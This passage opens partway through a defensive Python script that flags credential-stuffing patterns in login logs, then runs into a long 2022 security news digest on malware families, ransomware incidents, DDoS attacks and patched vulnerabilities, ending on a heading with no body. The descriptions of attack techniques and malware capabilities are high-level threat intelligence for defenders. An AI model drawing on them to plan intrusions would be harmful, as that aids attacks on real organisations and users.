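            fails[e["ip"]] += 1
    return sorted(ip for ip, n in fails.items() if n >= threshold)


def stuffing_indicators(events, min_users_per_ip=3, min_ips_per_user=3):
    """Signals that survive IP distribution across residential proxies.

    - ips_spraying_users: one source trying many distinct accounts
    - users_hit_from_many_ips: one account attempted from many sources
    - global_fail_ratio: fleet-wide failure rate over the window
    - suspect_successes: a login that succeeds after the same account
      failed from other IPs (the account is likely on a breached list)
    """
    users_by_ip = defaultdict(set)
    ips_by_user = defaultdict(set)
    failed_ips_by_user = defaultdict(set)
    suspect_successes = []
    failures = 0
    for e in events:
        user, ip = e["user"], e["ip"]
        users_by_ip[ip].add(user)
        ips_by_user[user].add(ip)
        if e["result"] == "FAIL":
            failures += 1
            failed_ips_by_user[user].add(ip)
        elif failed_ips_by_user[user] - {ip}:
            suspect_successes.append((user, ip))
    total = len(events)
    return {
        "ips_spraying_users": sorted(
            ip for ip, users in users_by_ip.items() if len(users) >= min_users_per_ip
        ),
        "users_hit_from_many_ips": sorted(
            u for u, ips in ips_by_user.items() if len(ips) >= min_ips_per_user
        ),
        "global_fail_ratio": round(failures / total, 3) if total else 0.0,
        "suspect_successes": suspect_successes,
    }


if __name__ == "__main__":
    evts = parse_auth_log(SAMPLE_LOG)
    print("per-IP threshold flags:", per_ip_failure_threshold(evts))  # nothing
    for k, v in stuffing_indicators(evts).items():
        print(f"{k}: {v}")
```

    On the sample, the per-IP rule flags nothing because no proxy exit fails more than three times, while the account-centric view flags three spraying sources, two targeted accounts, and the one successful takeover.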

    Google: Iranian Hackers Use New Tool to Steal Email from Victims

    State-sponsored Iranian hacking group Charming Kitten has been using a new tool to download email messages from targeted Gmail, Yahoo, and Microsoft Outlook accounts. The name of the utility is Hyperscraper, and like many of the threat actor’s tools and operations, it is far from sophisticated. The APT group uses the tool to steal emails from a victim’s inbox without leaving any traces of their intrusion. Google has attributed the still-under-development tool to Charming Kitten (APT35, Phosphorus), an Iranian-backed hacking group. Early samples of the malware date back to 2020.

    Threat Actor Deploys Raven Storm Tool to Perform DDoS Attacks

    The threat actor dubbed 'Mysterious Team' has used the Raven Storm tool to conduct distributed denial-of-service (DDoS) attacks against multiple targets. The news comes from CloudSEK, who detailed the new threat in an advisory on Sunday. The tool uses multi-threading to send multiple packets at a victim server. It can be used to take down servers and has also carried out Wi-Fi and application layer attacks (layer 3 network, layer 4 transport, and layer 5 application). The malware can also connect to a client via botnets.

    Escanor Malware Delivered in Weaponized Microsoft Office Documents

    Security researchers from Resecurity “identified a new RAT (Remote Administration Tool) advertised in Dark Web and Telegram called Escanor. The threat actors offer Android-based and PC-based versions of RAT, along with HVNC module and exploit builder to weaponize Microsoft Office and Adobe PDF documents to deliver malicious code.” Escanor has been for sale since January of this year, and started as a compact HVNC implant that allowed for silent remote connections to a victim's computer. Over time it has transformed into a full-scale commercial RAT with robust features. The group's Telegram channel has over 28,000 subscribers, leading researchers to believe the tool is building a credible reputation on the dark web. The tool is thought to have borrowed functionality from other cracked versions of dark web tools, including Venom RAT, 888 RAT and Pandora HVNC.

    WordPress Sites Hacked With Fake Cloudflare DDoS Alerts Pushing Malware

    According to security researchers at Sucuri, threat actors are now hacking poorly protected WordPress sites to display fake Cloudflare DDoS protection pages, enabling the download of malicious remote access trojans (RATs) like NetSupport RAT and Raccoon Stealer. “We recently discovered a malicious JavaScript injection affecting WordPress websites which results in a fake CloudFlare DDoS protection popup. Since these types of browser checks are so common on the web many users wouldn’t think twice before clicking this prompt to access the website they’re trying to visit. However, the prompt actually downloads a malicious .iso file onto the victim’s computer.”

    Grandoreiro Banking Malware Targets Manufacturers in Spain, Mexico

    Cyber analysts at Zscaler recently uncovered a new campaign that is targeting employees of a chemicals manufacturer in Spain and workers of automotive and machinery makers in Mexico with banking malware. Dubbed Grandoreiro, the banking trojan has been active since 2016 targeting Brazil and Peru, expanding to Mexico and Spain in 2019. In the latest campaign spotted by Zscaler, starting in June 2022 and still ongoing, researchers noted that Grandoreiro malware authors have added new features to evade detection and anti-analysis in addition to revamping their C2 system.

    Greek Natural Gas Operator Suffers Ransomware-Related Data Breach

    Greece's largest natural gas distributor DESFA confirmed on Saturday that they suffered a limited scope data breach and IT system outage following a cyberattack. In a public statement shared with local news outlets on Saturday, DESFA explained that hackers attempted to infiltrate its network but were thwarted by the quick response of its IT team. However, some files and data were accessed and possibly "leaked," so there was a network intrusion, even if limited.

    Two Years On, Apple iOS VPNs Still Leak IP Addresses

    Apple has left a VPN bypass vulnerability in iOS unfixed for at least two years, leaving identifying IP traffic data exposed, and there's no sign of a fix. Back in early 2020, secure mail provider ProtonMail reported a flaw in Apple’s iOS version 13.3.1 that prevented VPNs from encrypting all traffic. The issue was that the operating system failed to close existing connections.

    A Flaw in Amazon Ring Could Expose User’s Camera Recordings

    In May, Amazon fixed a high-severity vulnerability in its Ring app for Android that could have allowed a malicious app installed on a user’s device to access sensitive information and camera recordings. The Ring app allows users to monitor video feeds from multiple devices, including security cameras, video doorbells, and alarm systems. The Android application has been downloaded over 10 million times. Researchers from security firm Checkmarx discovered a vulnerability in the com.ringapp/com.ring[.]nh.deeplink.DeepLinkActivity activity, which was implicitly exported in the Android Manifest and, for this reason, it was accessible to other applications on the same device.

    Researchers Detail Evasive DarkTortilla Crypter Used to Deliver Malware

    Researchers at Secureworks recently disclosed details of a .NET-based crypter dubbed DarkTortilla that is being used by threat actors to distribute info stealers and remote access trojans (RATs) including AgentTesla, AsyncRat, NanoCore, and RedLine as well as popular payloads like Cobalt Strike and Metasploit. The malware can also be utilized to deliver “addon packages” such as additional malicious payloads, benign decoy documents, and executables. While it is not known where or for how much the tool is being sold, DarkTortilla has sparked interest among cybercriminals as it features anti-analysis and anti-tamper controls that can make detection, analysis, and eradication challenging.

    Google Blocks Largest HTTPS DDoS Attack ‘Reported to Date’

    A Google Cloud Armor customer was hit with a distributed denial-of-service (DDoS) attack over the HTTPS protocol that reached 46 million requests per second (RPS), making it the largest ever recorded of its kind. In just two minutes, the attack escalated from 100,000 RPS to a record-breaking 46 million RPS, almost 80% more than the previous record, an HTTPS DDoS of 26 million RPS that Cloudflare mitigated in June. The attack is said to have commenced on the morning of June 1, at 09:45 Pacific time, targeting a customer’s HTTP/S Load Balancer with an initial 10,000 RPS. Within 8 minutes, the attack grew to 100,000 RPS, causing Google’s Cloud Armor Adaptive Protection to detect the attack and generate an alert containing signatures based on data pulled from traffic analysis. The alert included a recommended rule that the security team deployed into their security policy to block the attack traffic. However, within the next 2 minutes, the attack increased from 100,000 RPS to a record-breaking 46 million RPS. In total the attack lasted for 69 minutes, ending at 10:54 am. Since Cloud Armor was blocking the traffic, the attack slowly decreased in size after peaking.

    Bumblebee Attacks, From Initial Access to the Compromise of Active Directory Services

    The Cybereason Global Security Operations Center (GSOC) Team analyzed a cyberattack that involved the Bumblebee Loader and detailed how the attackers were able to compromise the entire network. Most Bumblebee infections started by users executing LNK files (T1204.002) which use a system binary to load the malware. The malware is distributed through phishing messages using a malicious attachment (T1566.001) or a link (T1566.002) to the malicious archive containing Bumblebee.

    ATMZOW JS Sniffer Campaign Linked to Hancitor Malware

    Researchers from Group-IB found a link between the ATMZOW JS Sniffer campaign and the Hancitor malware downloader. They released their findings in a blog post this week. The connection was made early this week by threat intelligence analyst Victor Okorokov from Group-IB, who said ATMZOW successfully infected at least 483 websites across four continents since the beginning of 2019. Group-IB specialists collected information about ATMZOW’s recent activity and found ties with a phishing campaign targeting clients of a US bank based on the same JS obfuscation technique.

    BlackByte Ransomware Gang Is Back With New Extortion Tactics

    The BlackByte ransomware is back with version 2.0 of their operation, including a new data leak site utilizing new extortion techniques borrowed from LockBit. After a brief disappearance, the ransomware operation is now promoting a new data leak site on hacker forums and through Twitter accounts the threat actor controls. With BlackByte 2.0 recently being introduced, it is unclear what technical changes were made to the ransomware encryptor. As for BlackByte’s new Tor data leak site, the ransomware operators have introduced a similar extortion strategy to that of LockBit where victims can pay on the site to extend the publishing of their data by 24 hours ($5,000), download the data ($200,000), or destroy all the data ($300,000). These prices are not set in stone as they will vary depending on the victim being targeted.

    Apple Security Updates Fix 2 Zero-Days Used to Hack iPhones, Macs

    On Wednesday, Apple rolled out fixes to address two zero-day vulnerabilities that were previously exploited by threat actors to compromise several Apple products including iPhones, iPads, and Macs. The first vulnerability, tracked as CVE-2022-32804, is related to an out-of-bounds write vulnerability in the operating system’s kernel.

    Researchers Link Multi-Year Mass Credential Theft Campaign to Chinese Hackers

    Researchers at Recorded Future recently attributed a multi-year mass credential theft campaign targeting global humanitarian, think tank, and government organizations to a threat group that goes by the alias RedAlpha. First identified by Citizen Lab in January 2018, the threat group has a history of conducting cyber espionage and surveillance operations directed against the Tibetan community to facilitate intelligence collection.

    Google Fixes Fifth Chrome Zero-Day Bug Exploited This Year

    On Tuesday Google released a security update for the Chrome browser to address several vulnerabilities, one of which is a high-severity zero-day flaw. Tracked as CVE-2022-2856, the vulnerability is related to the insufficient validation of untrusted input in Intents, a feature that enables the launching of applications and web services directly from a web page. While Google has not disclosed the technical details of the bug, “bad input validation in software can serve as a pathway to overriding protections or exceeding the scope of the intended functionality, potentially leading to buffer overflow, directory traversal, SQL injection, cross-site scripting, null byte injection, and more.”

    North Korea-linked APT Targets Job Seekers with macOS Malware

    ESET researchers continue to monitor a cyberespionage campaign, tracked as “Operation In(ter)ception,” that has been active at least since June 2020. The campaign targets employees working in the aerospace and military sectors and leverages decoy job offer documents. In a series of tweets, ESET detailed a recent campaign from the group. They spotted a signed Mac executable disguised as a job description for Coinbase (T1036). The file was uploaded to VirusTotal from an IP in Brazil on August 11, 2022.

    The Return of LOIC, HOIC, HULK, and Slowloris to the Threat Landscape

    In the decade’s first half, simple denial-of-service tools, such as HOIC, HULK, LOIC, and Slowloris, were the go-to choices for hackers and hacktivists worldwide. When leveraged by a group in a coordinated attack like an Anonymous operation, the threat actors could launch powerful distributed denial-of-services (DDoS) attacks, resulting in more successful campaigns. But after the publication of BASHLITE’s source code in 2015 and Mirai’s source code in 2016, threat actors abandoned these old tools. They began focusing on building their own IoT botnets capable of launching much more powerful DDoS attacks.

    Hackers Attack UK Water Supplier but Extort Wrong Victim

    South Staffordshire Water, a company supplying 330 million liters of drinking water to 1.6 million consumers daily, has issued a statement confirming IT disruption from a cyberattack. “As the announcement explains, the safety and water distribution systems are still operational, so the disruption of the IT systems doesn’t impact the supply of safe water to its customers or those of its subsidiaries, Cambridge Water and South Staffs Water” (Bleeping Computer, 2022). “This is thanks to the robust systems and controls over water supply and quality we have in place at all times, as well as the quick work of our teams to respond to this incident and implement the additional measures we have put in place on a precautionary basis,” explains the statement published on the company’s site.

    Software Patching Flaw on macOS Could Let Hackers Bypass All Security Levels

    “An injection flaw (T1055) connected to how macOS handles software updates on the system could allow attackers to access all files on Mac devices” (Info Security Magazine, 2022). The flaw was found by macOS security specialist Patrick Wardle, who shared his findings at Black Hat. Threat actors can use the flaw to take over impacted devices. The flaw allows threat actors to escape the macOS sandbox (T1553.003) and bypass System Integrity Protection (SIP), which enables further deployment of non-authorized code (T1059). The vulnerability was found in December 2020 and was reported to Apple through the company’s bug bounty program.

    Malicious PyPI Packages Aim DDoS Attacks at Counter-Strike Servers

    A dozen malicious Python packages were uploaded to the PyPI repository this weekend in a typosquatting (T1036) attack that performs DDoS attacks on a Counter-Strike 1.6 server. The Python Package Index (PyPI) is a repository of open-source software packages that developers can easily incorporate into their Python projects to build complex apps with minimal effort. Anyone is able to upload packages to the PyPI repository, and it can take time for malicious packages to be reported and removed. The repository has frequently been abused by threat actors, who have used it to steal developer credentials and to spread malware.

    Android Banking Malware Now Also Infects Your Smartphone With Ransomware

    An Android banking trojan has re-emerged with new features that make it more powerful and more dangerous to a wider range of users. Also, it now delivers ransomware. The Sova Android banking malware first appeared for sale in underground markets in September last year, with its author stating that it was still under development. Even so, it still packed a punch, with the ability to harvest usernames and passwords via keylogging, stealing cookies and adding false overlays to a range of apps.

    Ransomware Attack Blamed for Closure of all 7-Eleven stores in Denmark

    As Bleeping Computer reports, the company has since confirmed that it was targeted by a ransomware attack, and that it is working with police investigators. Many of 7-Eleven’s stores in Denmark have since reopened. 7-Eleven Denmark is not sharing much in the way of technical detail regarding the attack, which means that not only do we not know what family of ransomware might have caused the disruption but we also do not know how it might have entered the organization in the first place.

    Three Extradited from UK to US on $5m BEC Charges

    Three Nigerian nationals have been extradited from the UK to the US after allegedly participating in business email compromise (BEC) attacks that attempted to steal millions from American organizations, including universities. The alleged crimes cover jurisdictions in North Carolina, Texas and Virginia. They relate to Oludayo Kolawole John Adeagbo (aka John Edwards and John Dayo), 43, a Nigerian citizen and UK resident; Donald Ikenna Echeazu (aka Donald Smith and Donald Dodient), 40, a dual UK and Nigerian citizen; and Olabanji Egbinola, 42.

    A New PyPI Package Was Found Delivering Fileless Linux Malware

    Researchers from Sonatype have discovered a new PyPI package named “secretslib” that is being used to drop a fileless cryptominer (T1496) into the memory of Linux machines. The package claims to offer “secrets matching and verification made easy.” It currently has around 93 downloads going back to August 2020. The package is used to stealthily run cryptominers on Linux machines directly from RAM (T1620). The package fetches a Linux executable from a remote server (T1105), which drops an ELF file called “memfd” into memory (T1027.002). A Monero crypto miner is the end result.

    Over 9,000 VNC Servers Exposed Online Without a Password

    Researchers have discovered at least 9,000 exposed VNC (virtual network computing) endpoints that can be accessed and used without authentication, allowing threat actors easy access to internal networks. VNC (virtual network computing) is a platform-independent system meant to help users connect to systems that require monitoring and adjustments, offering control of a remote computer via RFB (remote frame buffer protocol) over a network connection.

    US Govt Will Pay You $10 Million for Info on Conti Ransomware Members

    On Thursday, the U.S. State Department announced that it would be paying a $10 million reward for information related to five high-ranking Conti ransomware members that could lead to their identification or whereabouts. As part of the announcement, the State Department revealed the face of one of these members, known as “Target.” The other four members are known as “Tramp,” “Dandis,” “Professor,” and “Reshaev.”

    UK NHS Service Recovery May Take a Month After MSP Ransomware Attack

    On Thursday, August 4th, around 7 AM, a managed service provider (MSP) known as Advanced was the target of a ransomware attack that disrupted its systems. The attack resulted in a major outage of NHS emergency services across the United Kingdom. While Advanced did not reveal the identity of the ransomware group behind the attack, it stated that it had taken immediate action to mitigate the risk and isolate the Health and Care environments where the incident was detected.

    Iron Tiger Compromises Chat Application Mimi, Targets Windows, Mac, and Linux Users

    Security researchers from Trend Micro noticed a server hosting both a HyperBro sample and a malicious Mach-O executable named “rshell.” HyperBro is a malware family used by Iron Tiger (also known as Emissary Panda, APT27, Bronze Union, and LuckyMouse), an advanced persistent threat (APT) group that has been performing cyberespionage for almost a decade, and there had been no reports of this group being associated with a tool for the Mac operating system (OS). Trend Micro analyzed the Mach-O sample and found it to be a new malware family targeting the macOS platform. It also eventually found samples compiled for the Linux platform that belong to the same malware family.

    Automotive Supplier Breached by 3 Ransomware Gangs in 2 weeks

    An automotive supplier had its systems breached and files encrypted by three different ransomware gangs over two weeks in May, two of the attacks happening within just two hours. The attacks followed an initial breach of the company's systems by a likely initial access broker (IAB) (T1078) in December 2021, who exploited a firewall misconfiguration (T1190) to breach the domain controller server using a Remote Desktop Protocol (RDP) connection.

    Conti Extortion Gangs Behind Surge of BazarCall Phishing Attacks

    According to researchers at AdvIntel, three groups that have splintered off from the Conti ransomware operation are adopting BazarCall phishing tactics to gain initial access to victim networks. BazarCall, otherwise known as BazaCall, is a call-back phishing scheme that emerged in early 2021 as an attack vector used by the Ryuk ransomware operation, which later rebranded into Conti. “A BazarCall attack starts with an email informing that a subscription the recipient is allegedly paying for is about to be renewed automatically and canceling the payment is possible by calling a specific number. While the social engineer distracts the victim, the intruder determines how to compromise the network without triggering any alarm.”

    Cisco fixes bug allowing RSA private key theft on ASA, FTD devices

    Yesterday, Cisco released a security advisory to address a high-severity vulnerability affecting its Adaptive Security Appliance (ASA) and Firepower Threat Defense (FTD) Software. Tracked as CVE-2022-20866, the flaw is due to the mishandling of RSA keys on ASA and FTD devices. Successful exploitation of the CVE could enable an unauthenticated attacker to retrieve an RSA private key remotely, which in turn could be used by the actor to impersonate a device running Cisco ASA Software or Cisco FTD Software or to decrypt the device traffic. “This vulnerability is due to a logic error when the RSA key is stored in memory on a hardware platform that performs hardware-based cryptography. An attacker could exploit this vulnerability by using a Lenstra side-channel attack against the targeted device. A successful exploit could allow the attacker to retrieve the RSA private key,” stated Cisco in its advisory on Wednesday.

    Cyber-criminals Shift From Macros to Shortcut Files to Hack Business PCs, HP Reports

    HP’s Wolf Security released new research in its quarterly report, which highlights a cybercriminal shift away from Office macros. According to the researchers, various malware-spreading families are using shortcut (LNK) files (T1204.002) instead of Office macros, which are now blocked by default by Microsoft. “Specifically, the report shows an 11% rise in archive files containing malware, including LNK files. Further, the data suggests that 69% of malware detected was delivered via email, while web downloads were responsible for 17%.”

    VMware warns of public exploit for critical auth bypass vulnerability

    Last week, VMware addressed a critical authentication bypass flaw impacting several of its products, including VMware Workspace ONE Access, Identity Manager, and vRealize Automation. Tracked as CVE-2022-31656, the flaw could be exploited by a malicious actor with network access to the UI to gain administrative access without needing to authenticate. In addition to CVE-2022-31656, VMware also addressed a high-severity SQL injection flaw (CVE-2022-31659) that could enable remote attackers to achieve remote code execution.

    Microsoft Patches Windows DogWalk Zero-Day Exploited in Attacks

    As part of the August 2022 Patch Tuesday, Microsoft fixed 121 vulnerabilities, including 17 critical ones allowing for remote code execution and privilege escalation. One of the security flaws addressed by Microsoft is a high-severity Windows zero-day vulnerability (CVE-2022-34713) that is being actively exploited in the wild. Dubbed DogWalk, the flaw is related to a path traversal weakness in the Windows Support Diagnostic Tool (MSDT). Successful exploitation of this zero-day could enable threat actors to gain remote code execution on compromised systems when MSDT is called using the URL protocol from a calling application, typically Microsoft Word.

    KillNet Hacking Group Allegedly Targets Lockheed Martin and NASA

    On the group’s Telegram page, KillNet claims to have taken down websites connected with both Lockheed Martin and NASA. While the group uploaded a short video showing the alleged websites being down, the websites are operational at the time of this writing. KillNet has previously expressed its intent to target Lockheed Martin and other entities that have supported Ukraine during the current Russian invasion. KillNet has also claimed, without proof, to have dumped the data of job applicants for Lockheed Martin.

    U.S. Sanctions Virtual Currency Mixer Tornado Cash for Alleged Use in Laundering

    On Monday, the U.S. Treasury Department imposed sanctions on Tornado Cash, a crypto mixing service that is being used by cybercriminals to launder stolen money. Tornado Cash allows its users to move cryptocurrency assets between accounts by obfuscating their origin and destination. Since its creation in 2019, the platform has been used to launder more than $7.6 billion worth of virtual assets. According to blockchain analytics firm Elliptic, thefts, hacks, and fraud account for $1.5 billion of the total assets sent through the mixer.

    New IoT RapperBot Malware Targeting Linux Servers via SSH Brute-Forcing Attack

    A new IoT botnet malware dubbed RapperBot has been observed rapidly evolving its capabilities since it was first discovered in mid-June 2022. The malware, which gets its name from an embedded URL to a YouTube rap music video in an earlier version, is said to have amassed a growing collection of compromised SSH servers, with over 3,500 unique IP addresses used to scan and brute-force their way into the servers.

    LogoKit Update – The Phishing Kit Leveraging Open Redirect Vulnerabilities

    Threat actors have been leveraging open redirect vulnerabilities in online services and applications to bypass spam filters and deliver phishing messages. This information comes from researchers at Resecurity, who found that highly trusted domains such as Snapchat and other online services were being used in attacks against several financial institutions and other online services internationally.

    Slack Admits to Leaking Hashed Passwords for Five Years

    Popular collaboration tool Slack (not to be confused with the nickname of the world’s longest-running Linux distro, Slackware) has just owned up to a long-running cybersecurity SNAFU. According to a news bulletin entitled Notice about Slack password resets, the company admitted that it had inadvertently been oversharing personal data “when users created or revoked a shared invitation link for their workspace.” From 2017-04-17 to 2022-07-17, Slack said, the data sent to the recipients of such invitations included the sender’s hashed password. Slack’s security advisory doesn’t explain the breach very clearly, saying merely that “[t]his hashed password was not visible to any Slack clients; discovering it required actively monitoring encrypted network traffic coming from Slack’s servers.”

    Zero-Day Bug Responsible for Massive Twitter Breach

    A zero-day vulnerability in Twitter’s code base was responsible for a major data breach that is thought to have affected 5.4 million users, the social media firm has revealed. The threat actor was hoping to sell the profile data for $30,000 on a cybercrime site. Some information was scraped from public Twitter profiles, including location and image URL. However, they were crucially able to link account emails and phone numbers with account IDs by leveraging the vulnerability.

    North Korean Hackers Target Crypto Experts With Fake Coinbase Job Offers

    A new social engineering campaign by the notorious North Korean Lazarus hacking group has been discovered, with the hackers impersonating Coinbase to target employees in the fintech industry. A common tactic the hacking group uses is to approach targets over LinkedIn to present a job offer and hold a preliminary discussion as part of a social engineering attack.

    Chinese Hackers Use New Windows Malware to Backdoor Govt, Defense Orgs

    An extensive series of attacks detected in January used new Windows malware to backdoor government entities and organizations in the defense industry from several countries in Eastern Europe. Kaspersky linked the campaign with a Chinese APT group tracked as TA428, known for its information theft and espionage focus and attacking organizations in Asia and Eastern Europe [1, 2, 3, 4]. The threat actors successfully compromised the networks of dozens of targets, sometimes even taking control of their entire IT infrastructure by hijacking systems used to manage security solutions.

    Hacker Finds Kill Switch for Submachine Gun Wielding Robot Dog

    In July, a video of a robot dog with a submachine gun strapped to its back terrified the internet. Now a hacker who posts on Twitter as @d0tslash and on GitHub as MAVProxyUser has discovered that the robot dog contains a kill switch, and it can be accessed through a tiny handheld hacking device. “Good news!” d0tslash said on Twitter. “Remember that robot dog you saw with a gun!? It was made by @UnitreeRobotic. Seems all you need to dump it in the dirt is @flipper_zero. The PDB has a 433mhz backdoor.”

    Critical RCE vulnerability Impacts 29 Models of DrayTek Routers

    On Wednesday, the research team at Trellix disclosed details of an unauthenticated remote code execution vulnerability affecting multiple DrayTek routers (Vigor 3910 and 28 other DrayTek models sharing the same codebase). Tracked as CVE-2022-32548, the flaw received a CVSS score of 10/10, indicating a critical level of severity. “The attack can be performed without user interaction if the management interface of the device has been configured to be internet facing. A one-click attack can also be performed from within the LAN in the default device configuration,” stated Philippe Laulheret, a senior security researcher at Trellix.

    Thousands of hackers flock to 'Dark Utilities' C2-as-a-Service

    Security researchers found a new service called Dark Utilities that provides an easy and inexpensive way for cybercriminals to set up a command and control (C2) center for their malicious operations. A C2 server is how adversaries control their malware in the wild, sending out commands, configurations and new payloads, and receiving data collected from compromised systems. The Dark Utilities service provides threat actors a platform that supports Windows, Linux, and Python-based payloads, and eliminates the effort associated with implementing a C2 communication channel.

    CISA adds Zimbra email bug to Known Exploited Vulnerabilities Catalog

    The Cybersecurity & Infrastructure Security Agency (CISA) has added a recently disclosed flaw in the Zimbra email suite, tracked as CVE-2022-27924, to its Known Exploited Vulnerabilities Catalog. In mid-June, researchers from SonarSource discovered the high-severity vulnerability (CVSS score: 7.5) impacting the Zimbra email suite. It can be exploited by an unauthenticated attacker to steal the login credentials of users without user interaction.

    Open Redirect Flaw Snags Amex, Snapchat User Data

    Attackers are exploiting a well-known open redirect flaw to phish people’s credentials and personally identifiable information (PII) using American Express and Snapchat domains, researchers have found. Threat actors impersonated Microsoft and FedEx among other brands in two different campaigns, which researchers from INKY observed from mid-May through late July, they said in a blog post published online. Attackers took advantage of redirect vulnerabilities affecting American Express and Snapchat domains, the former of which eventually was patched while the latter still is not, researchers said.

    Cisco Fixes Critical Remote Code Execution Bug in VPN Routers

    Yesterday, Cisco rolled out fixes to address several vulnerabilities impacting its Small Business VPN routers. In total, Cisco addressed three vulnerabilities, tracked as CVE-2022-20842 (RCE and DoS vulnerability), CVE-2022-20827 (command injection vulnerability), and CVE-2022-20841 (command injection vulnerability). Exploitation of these bugs could enable unauthenticated, remote attackers to execute arbitrary code or commands and trigger denial-of-service conditions on vulnerable devices.

    Russian Organizations Attacked With New Woody Rat Malware

    Russian entities are being targeted by unknown attackers to spread a newly discovered malware that allows them to remotely control and steal information from compromised devices. Dubbed Woody Rat, the remote access trojan comes with a wide range of capabilities including collecting system information, listing folders and running processes, executing commands and files received from its command-and-control (C2) server, downloading, uploading, and deleting files on infected machines, and taking screenshots.

    Hackers deploy new ransomware tool in attacks on Albanian government websites

    Hackers apparently angry over the Iranian opposition group Mojahedin-e Khalq’s upcoming conference in Albania carried out disruptive cyberattacks on Albanian government sites last month, researchers from the cybersecurity firm Mandiant said Thursday. Based on the timing of the attacks in July, technical indicators associated with the malware and the focus on MEK, the researchers are moderately confident that hackers working to further the Iranian government’s goals were behind the attack, they said. The attacks, which forced the government of Albania to shut down online access to multiple government services, may have included a previously unknown backdoor called “ChimneySweep,” and a newly discovered ransomware tool known as “RoadSweep” to attack the government systems, the researchers said.

    QNAP Poisoned XML Command Injection (Silently Patched)

    CVE-2020-2509 was added to CISA’s Known Exploited Vulnerabilities Catalog in April 2022, and it was listed as one of the “Additional Routinely Exploited Vulnerabilities in 2021” in CISA’s 2021 Top Routinely Exploited Vulnerabilities alert. However, CVE-2020-2509 has no public exploit, and no other organizations have publicly confirmed exploitation in the wild.

    VMware Urges Admins to Patch Critical Auth Bypass Bug Immediately

    Yesterday, VMware released a security advisory to address a critical authentication bypass flaw affecting local domain users in several VMware products. Tracked as CVE-2022-31656, the flaw received a CVSS score of 9.8/10 and impacts VMware Workspace ONE Access, Identity Manager, and vRealize Automation. If exploited successfully, “a malicious actor with network access to the UI may be able to obtain administrative access without the need to authenticate,” stated VMware in its advisory.

    Chinese Hackers Use New Cobalt Strike-Like Attack Framework

    Researchers at Cisco Talos recently uncovered a new post-exploitation attack framework that is being deployed in the wild as an alternative to the widely abused Cobalt Strike toolset. Dubbed Manjusaka, the framework uses implants written in the cross-platform Rust programming language, while its binaries are written in Golang. Manjusaka comes with a RAT and a file management module, each featuring distinct capabilities. Similar to Cobalt Strike, its RAT implant supports command execution, file access, network reconnaissance, and more.

    LOLI Stealer – Golang-Based InfoStealer Spotted In The Wild

    Cyble Research Labs has been actively monitoring various stealers and blogging about them to keep its readers aware and informed. Recently, the researchers came across a malware sample which turned out to be a new malware variant named “LOLI Stealer.”

    The threat actor (TA) sells this stealer for fairly low prices, as listed below:

  • 499 rubles (~$9 USD) – one month
  • 799 rubles (~$14 USD) – two months
  • 1,499 rubles (~$25 USD) – lifetime, plus a universal sorter as a gift

    Through the course of their research, they have identified over 20 different samples related to the LOLI malware since June 2022, indicating that the malware has been actively deployed in recent weeks.

    Solana Hack Wipes More Than 7,000 Wallets, Totaling Nearly $5 Million in Losses

    An unidentified hacker used an exploit to drain funds from more than 7,000 cryptocurrency wallets on the Solana blockchain as of Wednesday morning. Solana confirmed on Twitter the extent of the hack that began Tuesday night. Outside cryptocurrency analysis firms have placed the losses at roughly $5 million worth of Solana currencies. Solana has not provided its own estimate. Solana says it has not yet identified the source of the exploit and is still investigating the attack. However, it appears to have affected “a software dependency shared by several software wallets,” Solana head of communications Austin Federa wrote on Twitter Tuesday night. The exploit allowed the attacker to sign transactions as users themselves, suggesting private keys were compromised. Researchers at cryptocurrency analysis firm Elliptic also suggested the attack was software-based.

    Browser Synchronization Abuse: Bookmarks as a Covert Data Exfiltration Channel

    Two universal and seemingly innocuous browser features – the ability to create bookmarks (aka “favorites”) and browser synchronization – make users’ lives easier, but may also allow hackers to establish a covert data exfiltration channel. Malicious browser extensions are a known and widespread threat, used by attackers to perform actions such as stealing passwords, exfiltrating email data or delivering additional malware. Some attackers have also recently managed to exploit Chrome’s syncing feature and use an extension to connect their computer directly to a targeted workstation, creating a covert channel for remote data manipulation, but also (conceivably) for data exfiltration and C&C communication.

    Millions of Arris Routers are Vulnerable to Path Traversal Attacks

    Security researcher Derek Abdine has published an advisory about vulnerabilities that exist in the MIT-licensed muhttpd web server. This web server is present in Arris firmware, which can be found in several router models. muhttpd (mu HTTP daemon) is a simple but complete web server written in portable ANSI C. It has three major goals: be simple, be portable, and be secure. Simplicity was the main goal for muhttpd, but because of its simplicity and broad use, it also must prioritize security.

    Over 3,200 Apps Leak Twitter API Keys, Some Allowing Account Hijacks

    Security researchers at CloudSEK uncovered thousands of mobile applications that are exposing Twitter API keys to the public. In turn, these keys could enable threat actors to take over users’ Twitter accounts that are associated with the app. The discovery was made possible after CloudSEK examined large app sets for potential data leaks. To their surprise, researchers uncovered 3,207 apps leaking a valid Consumer Key and Consumer Secret for the Twitter API.

    EU Missile Maker MBDA Confirms Data Theft Extortion, Denies Breach

    On July 30, 2022, a group of hackers who operate under the name “Andrastea” took to a popular hacking forum, claiming they had breached MBDA by leveraging critical network vulnerabilities. MBDA is one of the largest missile developers and manufacturers in Europe. It currently makes 45 different missile types, with another 15 in development, including air-to-air, surface-to-air, air-to-surface, anti-ship, anti-tank, and multiple-launcher systems.

    Australian Hacker Charged with Creating, Selling Spyware to Cyber Criminals

    A 24-year-old Australian national has been charged for his purported role in the creation and sale of spyware for use by domestic violence perpetrators and child sex offenders. Jacob Wayne John Keen, who currently resides at Frankston, Melbourne, is said to have created the remote access trojan (RAT) when he was 15, in addition to working as the administrator for the tool from 2013 until its shutdown in 2019 by the authorities.

    BlackCat Ransomware Claims Attack on European Gas Pipeline

    The ALPHV ransomware gang, aka BlackCat, claimed responsibility for a cyberattack against Creos Luxembourg S.A. last week, a natural gas pipeline and electricity network operator in the central European country. Creos’ owner, Encevo, who operates as an energy supplier in five EU countries, announced on July 25 that they had suffered a cyberattack the previous weekend, between July 22 and 23. While the cyberattack had resulted in the customer portals of Encevo and Creos becoming unavailable, there was no interruption in the provided services.

    Akamai: We stopped Record DDoS Attack in Europe

    Akamai Technologies squelched the largest-ever distributed denial-of-service (DDoS) attack in Europe earlier this month against a company that was being consistently hammered over a 30-day period. According to the cybersecurity and cloud services vendor, the height of the attack hit on July 21, when over a 14-hour period it peaked at 659.6 million packets per second (Mpps) and 853.7 gigabits per second (Gbps).

    There Is an Increase in Smishing Attacks, FCC Warns

